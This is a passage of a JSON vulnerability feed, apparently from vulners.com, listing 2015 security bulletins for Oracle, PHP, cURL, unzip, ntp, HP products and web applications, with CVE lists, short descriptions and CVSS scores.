"AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-4894", "CVE-2015-4000", "CVE-2015-4851", "CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4832", "CVE-2015-4822", "CVE-2015-4830", "CVE-2015-4804", "CVE-2015-4816", "CVE-2015-0235", "CVE-2015-1793", "CVE-2015-4793", "CVE-2015-4863", "CVE-2015-4913", "CVE-2015-4892", "CVE-2014-0191", "CVE-2015-4796", "CVE-2015-4864", "CVE-2015-4794", "CVE-2015-4887", "CVE-2015-2642", "CVE-2015-4860", "CVE-2015-4868", "CVE-1999-0377", "CVE-2015-4820", "CVE-2015-4903", "CVE-2015-0286", "CVE-2015-4906", "CVE-2015-4843", "CVE-2015-4842", "CVE-2015-4910", "CVE-2015-4872", "CVE-2015-4846", "CVE-2014-3576", 
"CVE-2015-4876", "CVE-2014-3571", "CVE-2015-4883", "CVE-2014-7940", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4882", "CVE-2015-4801", "CVE-2015-4878", "CVE-2015-4799", "CVE-2015-4811", "CVE-2015-4834", "CVE-2015-4762", "CVE-2015-4815", "CVE-2015-4812", "CVE-2015-4839", "CVE-2015-4798", "CVE-2015-4891", "CVE-2015-4734", "CVE-2015-4899", "CVE-2015-4865", "CVE-2015-4915", "CVE-2015-4871", "CVE-2015-4800", "CVE-2015-4869", "CVE-2015-4828", "CVE-2015-4803", "CVE-2015-4875", "CVE-2015-4902", "CVE-2015-4917", "CVE-2015-4909", "CVE-2015-4791", "CVE-2015-4805", "CVE-2015-4849", "CVE-2015-4879", "CVE-2015-4888", "CVE-2015-4838", "CVE-2015-4850", "CVE-2015-4806", "CVE-2015-4825", "CVE-2015-3144", "CVE-2015-4797", "CVE-2015-4792", "CVE-2015-4837", "CVE-2015-4904", "CVE-2015-4810", "CVE-2015-4827", "CVE-2014-0050", "CVE-2015-4817", "CVE-2015-4908", "CVE-2015-4912", "CVE-2015-4833", "CVE-2015-4847", "CVE-2015-4855", "CVE-2015-4848", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4896", "CVE-2015-2633", "CVE-2015-4807", "CVE-2015-4901", "CVE-2015-4835", "CVE-2015-4873", "CVE-2015-4766", "CVE-2015-4795", "CVE-2015-4907", "CVE-2015-4859", "CVE-2015-1829", "CVE-2015-4898", "CVE-2015-4874", "CVE-2015-4836", "CVE-2015-4824", "CVE-2015-4900", "CVE-2015-4831", "CVE-2015-4861", "CVE-2015-4911", "CVE-2015-4886", "CVE-2015-2608", "CVE-2015-4809", "CVE-2015-4877", "CVE-2015-4844", "CVE-2015-4870", "CVE-2015-4881", "CVE-2015-4840", "CVE-2015-4856", "CVE-2015-4845", "CVE-2015-4914", "CVE-2015-4893", "CVE-2015-4916", "CVE-2015-4826", "CVE-2014-1569", "CVE-2015-4862", "CVE-2010-1622", "CVE-2015-4857", "CVE-2015-4890", "CVE-2015-4867", "CVE-2015-4884", "CVE-2015-4813", "CVE-2015-4841", "CVE-2015-4818", "CVE-2015-4880", "CVE-2015-1791", "CVE-2015-4823", "CVE-2015-4821"], "description": "Quarterly update closes 140 vulnerabilities in different applications.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14755", "href": 
"https://vulners.com/securityvulns/SECURITYVULNS:VULN:14755", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "description": "PHAR extension DoS.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14753", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14753", "title": "PHP security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-7747"], "description": "Crash on audiofiles processing.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14754", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14754", "title": "audiofile memory corruption", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:54", "bulletinFamily": "software", "cvelist": ["CVE-2015-3236", "CVE-2015-3153", "CVE-2015-3144", "CVE-2015-3237", "CVE-2014-0015", "CVE-2015-3145", "CVE-2015-3143", "CVE-2015-3148"], "description": "Request may be sent via wrong connection if NTLM authentication is used. 
Information disclosure, DoS.", "edition": 1, "modified": "2015-11-01T00:00:00", "published": "2015-11-01T00:00:00", "id": "SECURITYVULNS:VULN:13544", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13544", "title": "cURL security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-7696", "CVE-2015-7697"], "description": "DoS, code execution.", "edition": 1, "modified": "2015-11-01T00:00:00", "published": "2015-11-01T00:00:00", "id": "SECURITYVULNS:VULN:14752", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14752", "title": "unzip security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-7703", "CVE-2015-7855", "CVE-2015-5219", "CVE-2015-7704", "CVE-2015-7701", "CVE-2015-7692", "CVE-2015-7702", "CVE-2015-5194", "CVE-2015-7852", "CVE-2015-7871", "CVE-2015-7691", "CVE-2015-5196", "CVE-2015-7705", "CVE-2015-5300", "CVE-2015-5195", "CVE-2015-7850", "CVE-2015-7853"], "description": "Multiple memory corruptions.", "edition": 1, "modified": "2015-11-01T00:00:00", "published": "2015-11-01T00:00:00", "id": "SECURITYVULNS:VULN:14751", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14751", "title": "ntp multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-7377", "CVE-2015-6000", "CVE-2015-5075", "CVE-2015-7390", "CVE-2015-6544", "CVE-2015-7668", "CVE-2015-5715", "CVE-2015-7373", "CVE-2015-6659", "CVE-2015-5956", "CVE-2015-3623", "CVE-2015-6660", "CVE-2015-7682", "CVE-2015-5723", 
"CVE-2015-7368", "CVE-2015-7319", "CVE-2015-7299", "CVE-2015-7669", "CVE-2015-5071", "CVE-2015-7371", "CVE-2015-7320", "CVE-2015-6497", "CVE-2015-4499", "CVE-2015-7683", "CVE-2015-7367", "CVE-2014-8778", "CVE-2015-7670", "CVE-2015-7391", "CVE-2015-7372", "CVE-2015-7366", "CVE-2015-7364", "CVE-2015-7667", "CVE-2015-5072", "CVE-2015-6545", "CVE-2015-7370", "CVE-2015-7666", "CVE-2015-6658", "CVE-2015-6576", "CVE-2015-5076", "CVE-2015-6584", "CVE-2015-5074", "CVE-2015-5603", "CVE-2015-7365", "CVE-2015-6661", "CVE-2015-7369", "CVE-2015-5714", "CVE-2015-6665"], "description": "PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc.", "edition": 1, "modified": "2015-10-26T00:00:00", "published": "2015-10-26T00:00:00", "id": "SECURITYVULNS:VULN:14750", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14750", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-5448"], "description": "No description provided", "edition": 1, "modified": "2015-10-26T00:00:00", "published": "2015-10-26T00:00:00", "id": "SECURITYVULNS:VULN:14749", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14749", "title": "HP Asset Manager information disclosure", "type": "securityvulns", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-2136", "CVE-2015-6029"], "description": "Authentication bypass, information disclosure.", "edition": 1, "modified": "2015-10-26T00:00:00", "published": "2015-10-26T00:00:00", "id": "SECURITYVULNS:VULN:14693", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14693", "title": "HP ArcSight Logger security 
vulnerabilities", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}]}